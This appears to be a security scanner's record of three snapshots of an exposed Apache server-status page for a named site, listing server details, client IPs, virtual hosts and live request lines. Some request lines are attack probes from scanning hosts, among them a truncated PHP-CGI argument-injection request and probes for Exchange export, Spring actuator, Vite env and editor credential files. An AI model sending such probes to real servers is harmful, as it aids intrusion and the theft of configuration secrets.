(open/recv/resp/push/rst) 0-34339495470/17/37538_ 2.647010162907080.00.361285.20 172.70.206.67h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/11/37544_ 2.8840171796970.00.551267.57 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 0-34339495470/13/37605_ 2.412651241489340.00.221182.79 172.71.218.252h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/12/37142_ 2.657042156216100.00.141259.23 172.64.217.25h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/9/37445_ 2.627010166798320.00.201191.27 172.68.175.40h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/11/37299_ 2.657040195743170.00.181313.79 162.158.90.225h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/6/42639_ 2.346510180457960.00.081377.97 172.70.214.230h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/5/43355_ 2.346510213728860.00.071385.17 172.70.207.71h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-34339495460/7/42909_ 2.51229281208328990.00.201344.36 162.158.41.244h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/5/42761_ 2.37656197200190120.00.061316.03 172.71.102.115h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-34339495460/11/43464_ 2.5820179865700.00.131385.62 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-34339495460/2/43999_ 2.04701453188964100.00.041313.97 172.69.35.137h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/11/43285_ 2.332240228395990.00.171326.52 172.69.34.154h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/7/43741_ 1.97705423181519150.00.161290.57 162.158.163.31h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/8/42003_ 2.357010290435480.00.081197.27 162.158.187.99h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/9/43415_ 2.262240418301920.00.231265.51 104.23.187.103h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/5/41115_ 2.612350199598820.00.031250.00 172.70.215.74h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/5/40180_ 2.432290242438110.00.031186.82 172.64.217.35h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/9/40900_ 2.392290264233490.00.171277.39 172.68.27.133h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/10/40094_ 2.432340192400940.00.101214.71 172.70.211.164h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/4/40409_ 2.17703805162532260.00.071403.05 172.71.124.95h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/9/40727_ 2.187051448187168120.00.111200.38 172.70.215.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/5/40343_ 2.347051179723720.00.031220.60 162.158.158.238h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/4/40573_ 2.437041188970050.00.051255.79 172.70.210.73h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/10/40674_ 2.427040194555000.00.351396.73 162.158.186.137h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/10/40694_ 2.437030220834310.00.161273.70 104.23.251.46h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34339495480/149/42923_ 10.310172248004470.03.431364.02 141.101.98.205h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34339495480/140/41534W 10.4500199872890.02.361208.14 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-34339495480/125/42645_ 10.4610218231240.03.511355.93 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 3-34339495480/142/41926_ 10.402366260770500.02.701383.51 172.70.115.224h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34339495480/134/41913_ 10.4720184892000.02.281268.33 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-34339495480/129/41951_ 10.4700187356610.02.821322.02 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-34339495480/144/42341_ 10.4620212067270.02.901407.09 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-34339495480/136/42408_ 10.4710290230390.05.581348.33 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-34339495480/153/41644_ 10.40226836626680.03.061313.80 162.158.123.73h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34339495480/132/42841R 10.4600329627120.02.601350.91 104.23.187.82h2tandemsl.com:443GET /en/energy-and-sustainability-consulting/energy-management- 4-34339496820/133/37436_ 10.0600328561010.02.071203.62 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-34339496820/137/37519_ 9.99317197562810.010.741260.75 162.158.120.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-34339496820/151/37718_ 10.0520170935050.02.591284.09 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 4-34339496820/153/38019_ 9.942187175652600.02.251150.30 172.71.222.99h2lcftech.es:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 4-34339496820/139/37450_ 10.0500182078100.02.82<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27ac980ead
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 12-Nov-2025 17:55:44 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 334 Parent Server MPM Generation: 333 Server uptime: 61 days 5 hours 34 minutes 41 seconds Server load: 0.16 0.20 0.18 Total accesses: 1928779 - Total Traffic: 60.0 GB - Total Duration: 1113242096 CPU Usage: u241.27 s241.43 cu10482.1 cs5916.06 - .319% CPU load .365 requests/sec - 11.9 kB/second - 32.6 kB/request - 577.174 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03628750no2yes010001 13628751no1yes19000 23628755no1yes010000 33628857no1yes010000 43628886no2yes010000 Sum507 149001 __________________W_______________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33336287500/201/35824_ 24.0940282225990.05.871327.07 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-33336287500/192/35209_ 24.0360434402540.016.831199.37 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/212/35566_ 24.0860150445620.03.871210.89 162.158.23.172h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/226/35546_ 24.0600167475230.05.441245.02 172.68.234.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/185/35806_ 24.0410156259570.020.111235.56 104.23.248.164h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/192/35907_ 24.0830164600830.018.301231.10 172.70.108.12h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/205/35999_ 24.0660233182030.05.191139.47 172.68.234.66h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/203/35439_ 24.1030149196320.031.971203.47 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-33336287500/203/35801_ 24.0460158949840.04.891165.66 172.70.108.61h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/216/35619_ 24.1020187756550.029.641272.53 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-33336287510/151/42191_ 22.0420179163430.018.941347.05 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-33336287510/169/42912_ 22.0400212307950.04.841362.80 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-33336287510/141/42475_ 21.9860206841010.028.931326.40 172.68.234.24h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/199/42324_ 22.0100198741880.05.081278.63 162.158.23.118h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/161/43004_ 22.0360177512550.017.451355.69 172.68.234.86h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/145/43547_ 21.9662187042720.014.971278.45 162.158.23.217h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/175/42837_ 22.0410226808830.020.471309.38 172.68.234.81h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33336287510/151/43278_ 22.0400179650390.06.681268.00 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-33336287510/136/41573W 22.0000287916460.04.591180.89 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-33336287510/157/42961_ 22.0160416481970.02.331222.87 108.162.210.200h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/87/38916_ 18.45121189878890.03.171157.50 155.190.34.98http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/86/37976_ 18.8470232973330.03.391086.73 172.68.234.126h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/97/38674_ 18.84100254494810.036.641208.75 172.70.108.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/93/37911_ 18.85110179802230.06.491135.32 207.154.197.113http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-33336287550/76/38143_ 18.5970152555160.04.481325.79 172.69.196.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/82/38513_ 18.81117175736750.02.371136.45 162.158.123.73h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/82/38290_ 18.8510170326000.04.261160.93 172.68.12.183h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/100/38333_ 18.876269179914180.01.751138.22 172.70.82.205h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/86/38609_ 18.727608181947880.03.381300.26 172.71.166.253h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33336287550/89/38471_ 18.8470209933990.015.351181.18 172.70.108.227h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/914/41439_ 52.2970241742170.035.441305.40 162.158.23.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/797/40074_ 52.2570194028080.027.121167.82 172.68.234.57h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/861/41136_ 52.2970211726580.050.041316.21 172.68.234.106h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/845/40485_ 52.2480254692090.075.461356.14 172.70.108.43h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/827/40484_ 52.2360178600020.031.831232.32 172.68.234.218h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-33336288570/918/40550_ 52.2460181542560.034.201261.64 172.68.234.196h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/935/40902_ 52.2271206257720.014.641358.57 162.158.23.171h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/942/40951_ 52.2460284227370.027.241315.15 172.68.234.190h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/873/40147_ 51.9260830365470.029.451281.05 172.68.34.127h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33336288570/892/41382_ 52.2271322682060.015.841302.98 172.68.234.22h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33336288860/1198/35348_ 60.0080316619270.043.591140.99 172.70.108.28h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-33336288860/1189/35389_ 60.0270187060030.032.901190.47 172.68.234.198h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33336288860/1179/35491_ 59.6471160322250.022.881220.85 155.190.34.98http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33336288860/1272/35899_ 60.0260165310110.028.131097.41 172.70.108.121h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33336288860/1247/35326_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b2731f3d44d
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 11-Nov-2025 00:19:49 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 326 Parent Server MPM Generation: 325 Server uptime: 59 days 11 hours 58 minutes 46 seconds Server load: 0.00 0.04 0.06 Total accesses: 1864258 - Total Traffic: 57.8 GB - Total Duration: 1069608948 CPU Usage: u163.88 s200.3 cu10239.7 cs5763.73 - .318% CPU load .363 requests/sec - 11.8 kB/second - 32.5 kB/request - 573.745 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03435778no0yes010000 13435914no0yes010000 23435779no0yes010000 33435776no1yes010000 43435777no0yes19000 Sum501 149000 _______________________________________________W__ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32534357780/47/34872_ 8.7539850279456030.00.881305.73 172.70.224.194h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-32534357780/36/34328_ 8.7539840431929080.01.011168.77 172.70.224.194h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-32534357780/41/34649_ 8.42398421147262940.01.041189.07 172.68.134.234h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/47/34635_ 8.754350165232190.013.811210.98 199.30.231.5http/1.1 0-32534357780/48/34927_ 8.2139850153875210.01.391196.43 172.68.102.19h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/42/35051_ 8.7539890161698090.00.521188.05 172.70.224.174h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-32534357780/46/35077_ 8.7539900230621250.013.631105.37 172.70.224.181h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-32534357780/43/34534_ 8.2239841146767910.00.741154.85 172.68.103.99h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-32534357780/41/34893_ 8.2139851156419230.01.321143.74 172.68.103.36h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/38/34700_ 8.7539890185402490.00.391224.34 172.70.224.196h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32534359140/51/40390_ 9.564300173905440.01.471268.50 172.70.224.184h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/53/41008_ 9.744350206351740.00.741302.93 104.23.248.209h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/50/40680_ 9.554380199659670.01.091222.50 172.70.224.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/54/40437_ 9.564350192924270.01.231185.60 172.70.224.175h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32534359140/52/41252_ 10.704430172018700.01.241276.68 172.68.135.147h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/45/41770_ 9.554300180980310.01.011233.52 172.70.224.184h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/49/41077_ 10.704350220981170.01.561228.64 172.71.81.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/46/41552_ 10.704350174373520.02.161203.99 172.69.176.152h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/49/39822_ 9.564300174976060.013.581143.80 172.70.224.189h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32534359140/54/41127_ 9.534380408752200.01.461137.66 172.70.224.173h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/43/37810_ 6.274390186706130.01.131122.28 162.158.249.134h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/69/36787_ 11.11433257229886710.02.831044.32 172.68.19.120h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-32534357790/57/37541_ 11.15438240251402000.01.831156.47 172.68.135.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/63/36709_ 11.144440176012780.02.741076.04 172.68.135.76h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/87/37034_ 9.914350149005920.02.271289.57 172.70.224.176h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/64/37407_ 9.904390171403600.02.081117.52 172.70.224.132h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/61/37199_ 9.924300167030750.02.141138.42 172.70.224.141h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/61/37171_ 9.364300176583890.02.201120.55 172.68.103.151h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/58/37483_ 11.154350178648070.01.481238.75 172.71.152.11h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/61/37333_ 11.11433551206316060.01.181149.38 172.68.19.120h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/287/40166_ 18.0000237654990.04.571264.87 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-32534357760/302/38886_ 18.0010187288210.06.091132.17 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-32534357760/281/39858_ 17.9920197591070.05.961248.79 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/310/39265_ 18.0000247297410.04.741271.71 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-32534357760/274/39243_ 17.952913168293540.05.021190.22 172.68.103.91h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/306/39262_ 17.840366176691790.03.721195.34 172.70.240.130h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/294/39537_ 17.970301195285150.017.191332.38 172.68.211.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/294/39585_ 17.761445275163280.020.151280.18 172.68.135.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/282/38908_ 17.972206824397890.04.491237.99 104.23.229.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/305/40073_ 18.0000317441950.04.441277.69 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-32534357770/325/34006_ 19.06112304067220.05.961094.66 139.99.25.135http/1.1relehse.com:443GET /login HTTP/1.1 4-32534357770/313/34080_ 18.9420146024300.04.401156.53 172.71.195.86h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32534357770/337/34169_ 19.06218146762680.06.351173.52 139.99.25.135http/1.1relehse.com:443GET / HTTP/1.1 4-32534357770/315/34498_ 19.0520161790660.05.691045.91 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 4-32534357770/332/33949_ 19.0620166829620.03.851059.97
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b2744b9e124
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 10-Nov-2025 04:57:51 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 322 Parent Server MPM Generation: 321 Server uptime: 58 days 16 hours 36 minutes 48 seconds Server load: 0.13 0.11 0.09 Total accesses: 1832016 - Total Traffic: 56.8 GB - Total Duration: 1054323270 CPU Usage: u208.09 s229.27 cu10031.6 cs5642.2 - .318% CPU load .361 requests/sec - 11.7 kB/second - 32.5 kB/request - 575.499 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03323830no0yes010000 13323827no0yes19000 23323961no1yes010000 33323825no0yes010000 43323826no0yes010000 Sum501 149000 __________W_______________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32133238300/27/34514_ 17.2410874274921330.00.191273.84 172.68.164.129h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/38/33952_ 17.1627520429237190.00.441159.75 198.41.231.29h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/31/34258_ 17.7013851146026250.00.251167.21 138.197.191.87http/1.1relehse.com:443GET /admin_layout/plugins/.DS_Store HTTP/1.1 0-32133238300/28/34253_ 17.70166429163966650.00.161188.99 34.116.39.67http/1.1 0-32133238300/35/34564_ 18.1710920152906800.00.361188.93 104.23.202.206h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/38/34674_ 18.0713880160235650.00.351178.59 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-32133238300/41/34678_ 17.9816683228992820.00.351084.61 34.116.39.67http/1.1relehse.com:443GET /admin_layout/assets/js/libs/lodash.compat.min.js HTTP/1.1 0-32133238300/30/34163_ 17.1627500144585230.00.341133.49 198.41.230.129h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/34/34509_ 17.9716681155322690.00.621125.60 34.116.39.67http/1.1relehse.com:443HEAD /admin_layout/plugins/nprogress/nprogress.js HTTP/1.1 0-32133238300/38/34343_ 17.7010872183297830.00.971217.26 138.197.191.87http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32133238270/480/39412W 35.2000166202080.08.391244.38 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-32133238270/472/40073_ 35.075431202975660.07.941286.61 172.70.100.46h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32133238270/462/39697_ 35.185220195736270.07.761201.27 172.69.59.200h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32133238270/495/39462_ 35.130461189983230.011.891142.26 172.71.254.55h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32133238270/495/40276_ 35.2210168238910.07.261236.41 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-32133238270/450/40867_ 35.2150178154350.07.871218.05 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 1-32133238270/497/40021_ 35.017108216076270.08.871195.43 74.249.245.248http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32133238270/478/40644_ 35.2200168333310.06.931185.70 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-32133238270/494/38855_ 35.2220165960060.09.571105.73 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-32133238270/484/40168_ 35.2150399307590.08.511108.98 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 2-32133239610/407/36679_ 32.7520182924180.011.081078.21 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-32133239610/381/35722_ 32.7600225809700.07.371014.14 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-32133239610/397/36452_ 32.7430247577860.010.261090.90 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 2-32133239610/396/35667_ 32.7420171908400.058.471048.12 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-32133239610/386/35974_ 32.7420145187120.06.651265.44 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-32133239610/368/36351_ 32.7520164431030.031.561084.68 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-32133239610/381/36158_ 32.7520163712570.08.021080.26 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-32133239610/407/36023_ 32.7500172042200.010.181094.90 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-32133239610/391/36424_ 32.7400167393390.07.241198.47 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 2-32133239610/387/36319_ 32.7510192558320.06.211118.28 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-32133238250/148/39733_ 22.2910940236405210.02.711254.87 198.41.230.57h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32133238250/154/38429_ 22.2666167186182450.01.991122.42 